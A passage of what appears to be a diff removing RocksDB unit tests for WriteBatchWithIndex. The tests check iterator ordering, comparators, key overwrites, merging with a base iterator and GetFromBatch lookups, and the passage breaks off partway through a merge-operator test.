-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "utilities/merge_operators.h"
-#include "utilities/merge_operators/string_append/stringappend.h"
-
-namespace rocksdb {
-
-namespace {
-class ColumnFamilyHandleImplDummy : public ColumnFamilyHandleImpl {
- public:
-  explicit ColumnFamilyHandleImplDummy(int id, const Comparator* comparator)
-      : ColumnFamilyHandleImpl(nullptr, nullptr, nullptr),
-        id_(id),
-        comparator_(comparator) {}
-  uint32_t GetID() const override { return id_; }
-  const Comparator* GetComparator() const override { return comparator_; }
-
- private:
-  uint32_t id_;
-  const Comparator* comparator_;
-};
-
-struct Entry {
-  std::string key;
-  std::string value;
-  WriteType type;
-};
-
-struct TestHandler : public WriteBatch::Handler {
-  std::map<uint32_t, std::vector<Entry>> seen;
-  virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                       const Slice& value) {
-    Entry e;
-    e.key = key.ToString();
-    e.value = value.ToString();
-    e.type = kPutRecord;
-    seen[column_family_id].push_back(e);
-    return Status::OK();
-  }
-  virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) {
-    Entry e;
-    e.key = key.ToString();
-    e.value = value.ToString();
-    e.type = kMergeRecord;
-    seen[column_family_id].push_back(e);
-    return Status::OK();
-  }
-  virtual void LogData(const Slice& blob) {}
-  virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) {
-    Entry e;
-    e.key = key.ToString();
-    e.value = "";
-    e.type = kDeleteRecord;
-    seen[column_family_id].push_back(e);
-    return Status::OK();
-  }
-};
-}  // namespace anonymous
-
-class WriteBatchWithIndexTest : public testing::Test {};
-
-void TestValueAsSecondaryIndexHelper(std::vector<Entry> entries,
-                                     WriteBatchWithIndex* batch) {
-  // In this test, we insert <key, value> to column family `data`, and
-  // <value, key> to column family `index`. Then iterator them in order
-  // and seek them by key.
-
-  // Sort entries by key
-  std::map<std::string, std::vector<Entry*>> data_map;
-  // Sort entries by value
-  std::map<std::string, std::vector<Entry*>> index_map;
-  for (auto& e : entries) {
-    data_map[e.key].push_back(&e);
-    index_map[e.value].push_back(&e);
-  }
-
-  ColumnFamilyHandleImplDummy data(6, BytewiseComparator());
-  ColumnFamilyHandleImplDummy index(8, BytewiseComparator());
-  for (auto& e : entries) {
-    if (e.type == kPutRecord) {
-      batch->Put(&data, e.key, e.value);
-      batch->Put(&index, e.value, e.key);
-    } else if (e.type == kMergeRecord) {
-      batch->Merge(&data, e.key, e.value);
-      batch->Put(&index, e.value, e.key);
-    } else {
-      assert(e.type == kDeleteRecord);
-      std::unique_ptr<WBWIIterator> iter(batch->NewIterator(&data));
-      iter->Seek(e.key);
-      ASSERT_OK(iter->status());
-      auto write_entry = iter->Entry();
-      ASSERT_EQ(e.key, write_entry.key.ToString());
-      ASSERT_EQ(e.value, write_entry.value.ToString());
-      batch->Delete(&data, e.key);
-      batch->Put(&index, e.value, "");
-    }
-  }
-
-  // Iterator all keys
-  {
-    std::unique_ptr<WBWIIterator> iter(batch->NewIterator(&data));
-    for (int seek_to_first : {0, 1}) {
-      if (seek_to_first) {
-        iter->SeekToFirst();
-      } else {
-        iter->Seek("");
-      }
-      for (auto pair : data_map) {
-        for (auto v : pair.second) {
-          ASSERT_OK(iter->status());
-          ASSERT_TRUE(iter->Valid());
-          auto write_entry = iter->Entry();
-          ASSERT_EQ(pair.first, write_entry.key.ToString());
-          ASSERT_EQ(v->type, write_entry.type);
-          if (write_entry.type != kDeleteRecord) {
-            ASSERT_EQ(v->value, write_entry.value.ToString());
-          }
-          iter->Next();
-        }
-      }
-      ASSERT_TRUE(!iter->Valid());
-    }
-    iter->SeekToLast();
-    for (auto pair = data_map.rbegin(); pair != data_map.rend(); ++pair) {
-      for (auto v = pair->second.rbegin(); v != pair->second.rend(); v++) {
-        ASSERT_OK(iter->status());
-        ASSERT_TRUE(iter->Valid());
-        auto write_entry = iter->Entry();
-        ASSERT_EQ(pair->first, write_entry.key.ToString());
-        ASSERT_EQ((*v)->type, write_entry.type);
-        if (write_entry.type != kDeleteRecord) {
-          ASSERT_EQ((*v)->value, write_entry.value.ToString());
-        }
-        iter->Prev();
-      }
-    }
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  // Iterator all indexes
-  {
-    std::unique_ptr<WBWIIterator> iter(batch->NewIterator(&index));
-    for (int seek_to_first : {0, 1}) {
-      if (seek_to_first) {
-        iter->SeekToFirst();
-      } else {
-        iter->Seek("");
-      }
-      for (auto pair : index_map) {
-        for (auto v : pair.second) {
-          ASSERT_OK(iter->status());
-          ASSERT_TRUE(iter->Valid());
-          auto write_entry = iter->Entry();
-          ASSERT_EQ(pair.first, write_entry.key.ToString());
-          if (v->type != kDeleteRecord) {
-            ASSERT_EQ(v->key, write_entry.value.ToString());
-            ASSERT_EQ(v->value, write_entry.key.ToString());
-          }
-          iter->Next();
-        }
-      }
-      ASSERT_TRUE(!iter->Valid());
-    }
-
-    iter->SeekToLast();
-    for (auto pair = index_map.rbegin(); pair != index_map.rend(); ++pair) {
-      for (auto v = pair->second.rbegin(); v != pair->second.rend(); v++) {
-        ASSERT_OK(iter->status());
-        ASSERT_TRUE(iter->Valid());
-        auto write_entry = iter->Entry();
-        ASSERT_EQ(pair->first, write_entry.key.ToString());
-        if ((*v)->type != kDeleteRecord) {
-          ASSERT_EQ((*v)->key, write_entry.value.ToString());
-          ASSERT_EQ((*v)->value, write_entry.key.ToString());
-        }
-        iter->Prev();
-      }
-    }
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  // Seek to every key
-  {
-    std::unique_ptr<WBWIIterator> iter(batch->NewIterator(&data));
-
-    // Seek the keys one by one in reverse order
-    for (auto pair = data_map.rbegin(); pair != data_map.rend(); ++pair) {
-      iter->Seek(pair->first);
-      ASSERT_OK(iter->status());
-      for (auto v : pair->second) {
-        ASSERT_TRUE(iter->Valid());
-        auto write_entry = iter->Entry();
-        ASSERT_EQ(pair->first, write_entry.key.ToString());
-        ASSERT_EQ(v->type, write_entry.type);
-        if (write_entry.type != kDeleteRecord) {
-          ASSERT_EQ(v->value, write_entry.value.ToString());
-        }
-        iter->Next();
-        ASSERT_OK(iter->status());
-      }
-    }
-  }
-
-  // Seek to every index
-  {
-    std::unique_ptr<WBWIIterator> iter(batch->NewIterator(&index));
-
-    // Seek the keys one by one in reverse order
-    for (auto pair = index_map.rbegin(); pair != index_map.rend(); ++pair) {
-      iter->Seek(pair->first);
-      ASSERT_OK(iter->status());
-      for (auto v : pair->second) {
-        ASSERT_TRUE(iter->Valid());
-        auto write_entry = iter->Entry();
-        ASSERT_EQ(pair->first, write_entry.key.ToString());
-        ASSERT_EQ(v->value, write_entry.key.ToString());
-        if (v->type != kDeleteRecord) {
-          ASSERT_EQ(v->key, write_entry.value.ToString());
-        }
-        iter->Next();
-        ASSERT_OK(iter->status());
-      }
-    }
-  }
-
-  // Verify WriteBatch can be iterated
-  TestHandler handler;
-  batch->GetWriteBatch()->Iterate(&handler);
-
-  // Verify data column family
-  {
-    ASSERT_EQ(entries.size(), handler.seen[data.GetID()].size());
-    size_t i = 0;
-    for (auto e : handler.seen[data.GetID()]) {
-      auto write_entry = entries[i++];
-      ASSERT_EQ(e.type, write_entry.type);
-      ASSERT_EQ(e.key, write_entry.key);
-      if (e.type != kDeleteRecord) {
-        ASSERT_EQ(e.value, write_entry.value);
-      }
-    }
-  }
-
-  // Verify index column family
-  {
-    ASSERT_EQ(entries.size(), handler.seen[index.GetID()].size());
-    size_t i = 0;
-    for (auto e : handler.seen[index.GetID()]) {
-      auto write_entry = entries[i++];
-      ASSERT_EQ(e.key, write_entry.value);
-      if (write_entry.type != kDeleteRecord) {
-        ASSERT_EQ(e.value, write_entry.key);
-      }
-    }
-  }
-}
-
-TEST_F(WriteBatchWithIndexTest, TestValueAsSecondaryIndex) {
-  Entry entries[] = {
-      {"aaa", "0005", kPutRecord},
-      {"b", "0002", kPutRecord},
-      {"cdd", "0002", kMergeRecord},
-      {"aab", "00001", kPutRecord},
-      {"cc", "00005", kPutRecord},
-      {"cdd", "0002", kPutRecord},
-      {"aab", "0003", kPutRecord},
-      {"cc", "00005", kDeleteRecord},
-  };
-  std::vector<Entry> entries_list(entries, entries + 8);
-
-  WriteBatchWithIndex batch(nullptr, 20);
-
-  TestValueAsSecondaryIndexHelper(entries_list, &batch);
-
-  // Clear batch and re-run test with new values
-  batch.Clear();
-
-  Entry new_entries[] = {
-      {"aaa", "0005", kPutRecord},
-      {"e", "0002", kPutRecord},
-      {"add", "0002", kMergeRecord},
-      {"aab", "00001", kPutRecord},
-      {"zz", "00005", kPutRecord},
-      {"add", "0002", kPutRecord},
-      {"aab", "0003", kPutRecord},
-      {"zz", "00005", kDeleteRecord},
-  };
-
-  entries_list = std::vector<Entry>(new_entries, new_entries + 8);
-
-  TestValueAsSecondaryIndexHelper(entries_list, &batch);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestComparatorForCF) {
-  ColumnFamilyHandleImplDummy cf1(6, nullptr);
-  ColumnFamilyHandleImplDummy reverse_cf(66, ReverseBytewiseComparator());
-  ColumnFamilyHandleImplDummy cf2(88, BytewiseComparator());
-  WriteBatchWithIndex batch(BytewiseComparator(), 20);
-
-  batch.Put(&cf1, "ddd", "");
-  batch.Put(&cf2, "aaa", "");
-  batch.Put(&cf2, "eee", "");
-  batch.Put(&cf1, "ccc", "");
-  batch.Put(&reverse_cf, "a11", "");
-  batch.Put(&cf1, "bbb", "");
-
-  Slice key_slices[] = {"a", "3", "3"};
-  Slice value_slice = "";
-  batch.Put(&reverse_cf, SliceParts(key_slices, 3),
-            SliceParts(&value_slice, 1));
-  batch.Put(&reverse_cf, "a22", "");
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&cf1));
-    iter->Seek("");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("bbb", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("ccc", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("ddd", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&cf2));
-    iter->Seek("");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("aaa", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("eee", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&reverse_cf));
-    iter->Seek("");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("z");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a33", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a22", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a11", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("a22");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a22", iter->Entry().key.ToString());
-
-    iter->Seek("a13");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a11", iter->Entry().key.ToString());
-  }
-}
-
-TEST_F(WriteBatchWithIndexTest, TestOverwriteKey) {
-  ColumnFamilyHandleImplDummy cf1(6, nullptr);
-  ColumnFamilyHandleImplDummy reverse_cf(66, ReverseBytewiseComparator());
-  ColumnFamilyHandleImplDummy cf2(88, BytewiseComparator());
-  WriteBatchWithIndex batch(BytewiseComparator(), 20, true);
-
-  batch.Put(&cf1, "ddd", "");
-  batch.Merge(&cf1, "ddd", "");
-  batch.Delete(&cf1, "ddd");
-  batch.Put(&cf2, "aaa", "");
-  batch.Delete(&cf2, "aaa");
-  batch.Put(&cf2, "aaa", "aaa");
-  batch.Put(&cf2, "eee", "eee");
-  batch.Put(&cf1, "ccc", "");
-  batch.Put(&reverse_cf, "a11", "");
-  batch.Delete(&cf1, "ccc");
-  batch.Put(&reverse_cf, "a33", "a33");
-  batch.Put(&reverse_cf, "a11", "a11");
-  Slice slices[] = {"a", "3", "3"};
-  batch.Delete(&reverse_cf, SliceParts(slices, 3));
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&cf1));
-    iter->Seek("");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("ccc", iter->Entry().key.ToString());
-    ASSERT_TRUE(iter->Entry().type == WriteType::kDeleteRecord);
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("ddd", iter->Entry().key.ToString());
-    ASSERT_TRUE(iter->Entry().type == WriteType::kDeleteRecord);
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&cf2));
-    iter->SeekToLast();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("eee", iter->Entry().key.ToString());
-    ASSERT_EQ("eee", iter->Entry().value.ToString());
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("aaa", iter->Entry().key.ToString());
-    ASSERT_EQ("aaa", iter->Entry().value.ToString());
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToFirst();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("aaa", iter->Entry().key.ToString());
-    ASSERT_EQ("aaa", iter->Entry().value.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("eee", iter->Entry().key.ToString());
-    ASSERT_EQ("eee", iter->Entry().value.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&reverse_cf));
-    iter->Seek("");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("z");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a33", iter->Entry().key.ToString());
-    ASSERT_TRUE(iter->Entry().type == WriteType::kDeleteRecord);
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a11", iter->Entry().key.ToString());
-    ASSERT_EQ("a11", iter->Entry().value.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a11", iter->Entry().key.ToString());
-    ASSERT_EQ("a11", iter->Entry().value.ToString());
-    iter->Prev();
-
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a33", iter->Entry().key.ToString());
-    ASSERT_TRUE(iter->Entry().type == WriteType::kDeleteRecord);
-    iter->Prev();
-    ASSERT_TRUE(!iter->Valid());
-  }
-}
-
-namespace {
-typedef std::map<std::string, std::string> KVMap;
-
-class KVIter : public Iterator {
- public:
-  explicit KVIter(const KVMap* map) : map_(map), iter_(map_->end()) {}
-  virtual bool Valid() const { return iter_ != map_->end(); }
-  virtual void SeekToFirst() { iter_ = map_->begin(); }
-  virtual void SeekToLast() {
-    if (map_->empty()) {
-      iter_ = map_->end();
-    } else {
-      iter_ = map_->find(map_->rbegin()->first);
-    }
-  }
-  virtual void Seek(const Slice& k) { iter_ = map_->lower_bound(k.ToString()); }
-  virtual void SeekForPrev(const Slice& k) {
-    iter_ = map_->upper_bound(k.ToString());
-    Prev();
-  }
-  virtual void Next() { ++iter_; }
-  virtual void Prev() {
-    if (iter_ == map_->begin()) {
-      iter_ = map_->end();
-      return;
-    }
-    --iter_;
-  }
-
-  virtual Slice key() const { return iter_->first; }
-  virtual Slice value() const { return iter_->second; }
-  virtual Status status() const { return Status::OK(); }
-
- private:
-  const KVMap* const map_;
-  KVMap::const_iterator iter_;
-};
-
-void AssertIter(Iterator* iter, const std::string& key,
-                const std::string& value) {
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(key, iter->key().ToString());
-  ASSERT_EQ(value, iter->value().ToString());
-}
-
-void AssertItersEqual(Iterator* iter1, Iterator* iter2) {
-  ASSERT_EQ(iter1->Valid(), iter2->Valid());
-  if (iter1->Valid()) {
-    ASSERT_EQ(iter1->key().ToString(), iter2->key().ToString());
-    ASSERT_EQ(iter1->value().ToString(), iter2->value().ToString());
-  }
-}
-}  // namespace
-
-TEST_F(WriteBatchWithIndexTest, TestRandomIteraratorWithBase) {
-  std::vector<std::string> source_strings = {"a", "b", "c", "d", "e",
-                                             "f", "g", "h", "i", "j"};
-  for (int rand_seed = 301; rand_seed < 366; rand_seed++) {
-    Random rnd(rand_seed);
-
-    ColumnFamilyHandleImplDummy cf1(6, BytewiseComparator());
-    ColumnFamilyHandleImplDummy cf2(2, BytewiseComparator());
-    ColumnFamilyHandleImplDummy cf3(8, BytewiseComparator());
-
-    WriteBatchWithIndex batch(BytewiseComparator(), 20, true);
-
-    if (rand_seed % 2 == 0) {
-      batch.Put(&cf2, "zoo", "bar");
-    }
-    if (rand_seed % 4 == 1) {
-      batch.Put(&cf3, "zoo", "bar");
-    }
-
-    KVMap map;
-    KVMap merged_map;
-    for (auto key : source_strings) {
-      std::string value = key + key;
-      int type = rnd.Uniform(6);
-      switch (type) {
-        case 0:
-          // only base has it
-          map[key] = value;
-          merged_map[key] = value;
-          break;
-        case 1:
-          // only delta has it
-          batch.Put(&cf1, key, value);
-          map[key] = value;
-          merged_map[key] = value;
-          break;
-        case 2:
-          // both has it. Delta should win
-          batch.Put(&cf1, key, value);
-          map[key] = "wrong_value";
-          merged_map[key] = value;
-          break;
-        case 3:
-          // both has it. Delta is delete
-          batch.Delete(&cf1, key);
-          map[key] = "wrong_value";
-          break;
-        case 4:
-          // only delta has it. Delta is delete
-          batch.Delete(&cf1, key);
-          map[key] = "wrong_value";
-          break;
-        default:
-          // Neither iterator has it.
-          break;
-      }
-    }
-
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&map)));
-    std::unique_ptr<Iterator> result_iter(new KVIter(&merged_map));
-
-    bool is_valid = false;
-    for (int i = 0; i < 128; i++) {
-      // Random walk and make sure iter and result_iter returns the
-      // same key and value
-      int type = rnd.Uniform(5);
-      ASSERT_OK(iter->status());
-      switch (type) {
-        case 0:
-          // Seek to First
-          iter->SeekToFirst();
-          result_iter->SeekToFirst();
-          break;
-        case 1:
-          // Seek to last
-          iter->SeekToLast();
-          result_iter->SeekToLast();
-          break;
-        case 2: {
-          // Seek to random key
-          auto key_idx = rnd.Uniform(static_cast<int>(source_strings.size()));
-          auto key = source_strings[key_idx];
-          iter->Seek(key);
-          result_iter->Seek(key);
-          break;
-        }
-        case 3:
-          // Next
-          if (is_valid) {
-            iter->Next();
-            result_iter->Next();
-          } else {
-            continue;
-          }
-          break;
-        default:
-          assert(type == 4);
-          // Prev
-          if (is_valid) {
-            iter->Prev();
-            result_iter->Prev();
-          } else {
-            continue;
-          }
-          break;
-      }
-      AssertItersEqual(iter.get(), result_iter.get());
-      is_valid = iter->Valid();
-    }
-  }
-}
-
-TEST_F(WriteBatchWithIndexTest, TestIteraratorWithBase) {
-  ColumnFamilyHandleImplDummy cf1(6, BytewiseComparator());
-  ColumnFamilyHandleImplDummy cf2(2, BytewiseComparator());
-  WriteBatchWithIndex batch(BytewiseComparator(), 20, true);
-
-  {
-    KVMap map;
-    map["a"] = "aa";
-    map["c"] = "cc";
-    map["e"] = "ee";
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "e", "ee");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    AssertIter(iter.get(), "e", "ee");
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Prev();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("b");
-    AssertIter(iter.get(), "c", "cc");
-
-    iter->Prev();
-    AssertIter(iter.get(), "a", "aa");
-
-    iter->Seek("a");
-    AssertIter(iter.get(), "a", "aa");
-  }
-
-  // Test the case that there is one element in the write batch
-  batch.Put(&cf2, "zoo", "bar");
-  batch.Put(&cf1, "a", "aa");
-  {
-    KVMap empty_map;
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&empty_map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  batch.Delete(&cf1, "b");
-  batch.Put(&cf1, "c", "cc");
-  batch.Put(&cf1, "d", "dd");
-  batch.Delete(&cf1, "e");
-
-  {
-    KVMap map;
-    map["b"] = "";
-    map["cc"] = "cccc";
-    map["f"] = "ff";
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "cc", "cccc");
-    iter->Next();
-    AssertIter(iter.get(), "d", "dd");
-    iter->Next();
-    AssertIter(iter.get(), "f", "ff");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    AssertIter(iter.get(), "f", "ff");
-    iter->Prev();
-    AssertIter(iter.get(), "d", "dd");
-    iter->Prev();
-    AssertIter(iter.get(), "cc", "cccc");
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "cc", "cccc");
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Prev();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("c");
-    AssertIter(iter.get(), "c", "cc");
-
-    iter->Seek("cb");
-    AssertIter(iter.get(), "cc", "cccc");
-
-    iter->Seek("cc");
-    AssertIter(iter.get(), "cc", "cccc");
-    iter->Next();
-    AssertIter(iter.get(), "d", "dd");
-
-    iter->Seek("e");
-    AssertIter(iter.get(), "f", "ff");
-
-    iter->Prev();
-    AssertIter(iter.get(), "d", "dd");
-
-    iter->Next();
-    AssertIter(iter.get(), "f", "ff");
-  }
-
-  {
-    KVMap empty_map;
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&empty_map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "d", "dd");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    AssertIter(iter.get(), "d", "dd");
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Prev();
-    AssertIter(iter.get(), "a", "aa");
-
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("aa");
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "d", "dd");
-
-    iter->Seek("ca");
-    AssertIter(iter.get(), "d", "dd");
-
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-  }
-}
-
-TEST_F(WriteBatchWithIndexTest, TestIteraratorWithBaseReverseCmp) {
-  ColumnFamilyHandleImplDummy cf1(6, ReverseBytewiseComparator());
-  ColumnFamilyHandleImplDummy cf2(2, ReverseBytewiseComparator());
-  WriteBatchWithIndex batch(BytewiseComparator(), 20, true);
-
-  // Test the case that there is one element in the write batch
-  batch.Put(&cf2, "zoo", "bar");
-  batch.Put(&cf1, "a", "aa");
-  {
-    KVMap empty_map;
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&empty_map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  batch.Put(&cf1, "c", "cc");
-  {
-    KVMap map;
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("b");
-    AssertIter(iter.get(), "a", "aa");
-
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-
-    iter->Seek("a");
-    AssertIter(iter.get(), "a", "aa");
-  }
-
-  // default column family
-  batch.Put("a", "b");
-  {
-    KVMap map;
-    map["b"] = "";
-    std::unique_ptr<Iterator> iter(batch.NewIteratorWithBase(new KVIter(&map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "b");
-    iter->Next();
-    AssertIter(iter.get(), "b", "");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    AssertIter(iter.get(), "b", "");
-    iter->Prev();
-    AssertIter(iter.get(), "a", "b");
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("b");
-    AssertIter(iter.get(), "b", "");
-
-    iter->Prev();
-    AssertIter(iter.get(), "a", "b");
-
-    iter->Seek("0");
-    AssertIter(iter.get(), "a", "b");
-  }
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatch) {
-  Options options;
-  WriteBatchWithIndex batch;
-  Status s;
-  std::string value;
-
-  s = batch.GetFromBatch(options, "b", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  batch.Put("a", "a");
-  batch.Put("b", "b");
-  batch.Put("c", "c");
-  batch.Put("a", "z");
-  batch.Delete("c");
-  batch.Delete("d");
-  batch.Delete("e");
-  batch.Put("e", "e");
-
-  s = batch.GetFromBatch(options, "b", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  s = batch.GetFromBatch(options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("z", value);
-
-  s = batch.GetFromBatch(options, "c", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = batch.GetFromBatch(options, "d", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = batch.GetFromBatch(options, "x", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = batch.GetFromBatch(options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e", value);
-
-  batch.Merge("z", "z");
-
-  s = batch.GetFromBatch(options, "z", &value);
-  ASSERT_NOK(s);  // No merge operator specified.
-
-  s = batch.GetFromBatch(options, "b", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatchMerge) {
-  DB* db;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  options.create_if_missing = true;
-
-  std::string dbname = test::TmpDir() + "/write_batch_with_index_test";
-
-  DestroyDB(dbname, options);
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-
-  ColumnFamilyHandle* column_family = db->DefaultColumnFamily();
-  WriteBatchWithIndex batch;
-  std::string value;
-
-  s = batch.GetFromBatch(options, "x", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  batch.Put("x", "X");
-  std::string expected = "X";
-
-  for (int i = 0; i < 5; i++) {
-    batch.Merge("x", ToString(i));
-    expected = expected + "," + ToString(i);
-
-    if (i % 2 == 0) {
-      batch.Put("y", ToString(i / 2));
-    }
-
-    batch.Merge("z", "z");
-
-    s = batch.GetFromBatch(column_family, options, "x", &value);
-    ASSERT_OK(s);
-    ASSERT_EQ(expected, value);
-
-    s = batch.GetFromBatch(column_family, options, "y", &value);
-    ASSERT_OK(s);
-    ASSERT_EQ(ToString(i / 2), value);
-
